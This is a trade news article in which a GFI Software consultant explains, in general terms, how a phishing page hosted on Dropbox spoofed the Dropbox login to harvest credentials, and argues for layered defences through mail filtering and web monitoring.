Menu
Why Dropbox dropped the ball during phishing scam…

Why Dropbox dropped the ball during phishing scam…

“Talk about a meta sort of attack,” says Casper Manes, consultant, GFI Software, reacting to a phishing attack which used “Dropbox to spoof Dropbox.”

“Talk about a meta sort of attack,” says Casper Manes, consultant, GFI Software, reacting to a phishing attack which used “Dropbox to spoof Dropbox.”

Manes’ comments follow news that the storage company recently detected and shut down a spoofing page designed to grab users’ credentials to Dropbox and other webmail based systems that was hosted on Dropbox itself.

Hosting a fake login page within the Dropbox service itself, the attacker or attackers leveraged a number of things to help convince victims that they were visiting a legitimate page, rather than falling victim to a hoax.

In Manes’ own words, here’s how it worked:

“The attackers created a well-designed web page, hosted on Dropbox itself in a user account set up for the purpose, and that looks like a legitimate Dropbox login page,” he says.

“They then sent emails to victims, informing them that someone tried to send them a large file, and advising them to click a link in the email to access the data.

“Of course, no one should click a link in an email they are not expecting, but we all know that users continue to do so.

“Since the URL was within a Dropbox domain, even clever users who copy and paste, or manually type in a URL, might see this as legitimate.

Manes says the hoax page was accessible over HTTPS, since it was hosted in a user’s Dropbox, meaning many users would only see that the padlock icon displayed and assume that they were safe.

As some elements were accessed over HTTP, he says that some browsers might warn users that not all content is secure, but that is too common a failing of legitimate sites, and nothing to count on to prevent users from doing bad things.

“The form prompted users for their credentials, using either their Dropbox account or one of the popular webmail providers,” he explains.

“After harvesting credentials, the page simply redirected users to Dropbox’s own login page, much like you might see when a webpage malfunctions.”

Dropbox quickly detected and disabled access to the hoax page, and should be commended for their detection, rapid response and disclosure of the event, according to Danes.

“But all of that is reactionary,” he adds, “and some users may have become victims.

“As organisations that rely on Internet services, we need to be more proactive in how we defend users from these sorts of attacks.”

To succeed, Manes believes phishing messages have to get through to victims’ mailboxes.

“Proper mail filtering solutions can and should be used to detect and block phishing attacks like this,” he claims. “They can be used to not only filter out spam and malware, but also to detect and block phishing messages before they even get to your users.

“If there is no phishing message in their inbox, there is nothing for them to click on.”

Layer defences…

But according to Manes, the best defences are layered ones; “should a phishing message get through to your users, you don’t want their own best judgment to be the only other protection,” he adds.

“Good web monitoring solutions offer active scanning of all downloads and blocks access to known harmful websites, like those that host malware, or are known phishing domains.

“By protecting users from compromised and malicious websites, you can protect them whether an email with a link gets through, they manually type in a URL, or they try to visit a legitimate site that fell victim to a compromise and is now serving malware.”

While this clever attack was quickly shut down by Dropbox, Manes believes it won’t be the last time “some clever attacker” uses a system to take advantage of victims.

“Blocking all access to all external solutions is no solution at all,” he claims, “as many of these, Dropbox included, offer fantastic capabilities to users and businesses alike, but you have to provide access in a safe and secure manner.

“Combining mail filtering with web monitoring gives you the one-two punch you need to knock out the opposition before they make victims of your users.”


Follow Us

Join the New Zealand Reseller News newsletter!

Error: Please check your email address.

Tags dropboxstoragesecurityGFI Software

Featured

Slideshows

Consegna comes to town with AWS cloud offerings launch in Auckland

Consegna comes to town with AWS cloud offerings launch in Auckland

Emerging start-up Consegna has officially launched its cloud offerings in the New Zealand market, through a kick-off event held at Seafarers Building in Auckland.​ Founded in June 2016, the Auckland-based business is backed by AWS and supported by a global team of cloud specialists, leveraging global managed services partnerships with Rackspace locally.

Consegna comes to town with AWS cloud offerings launch in Auckland
Veritas honours top performing trans-Tasman partners

Veritas honours top performing trans-Tasman partners

Veritas honoured its top performing partners across the channel in Australia and New Zealand, recognising innovation and excellence on both sides of the Tasman. Revealed under the Vivid lights in Sydney, Intalock claimed the coveted Partner of the Year 2017 (Pacific) award, with Data#3 acknowledged for 12 months of strong growth across the market. Meanwhile, Datacom took home the New Zealand honours, with Global Storage and Insentra winning service provider and consulting awards respectively. Dicker Data was recognised as the standout distributor of the year, while Hitachi Data Systems claimed the alliance partner award. Photos by Bob Seary.

Veritas honours top performing trans-Tasman partners
An Evening With Eugene Kaspersky for Kiwi partners in Auckland

An Evening With Eugene Kaspersky for Kiwi partners in Auckland

​New Zealand partners came together for An Evening With Eugene Kaspersky in Auckland, an invitation only event as part of Kaspersky Lab Partner Engage. Following an evening of insights and executive networking with the founder of Kaspersky Lab, Eugene Kaspersky, Kiwi partners got up close and personal with Eugene in an unprecedented​ panel discussion. Facilitated by Reseller News, this panel explored channel relationships, successful business strategies, and the latest ground breaking technologies to impact the security market. Photos by Maria Stefina.

An Evening With Eugene Kaspersky for Kiwi partners in Auckland
Show Comments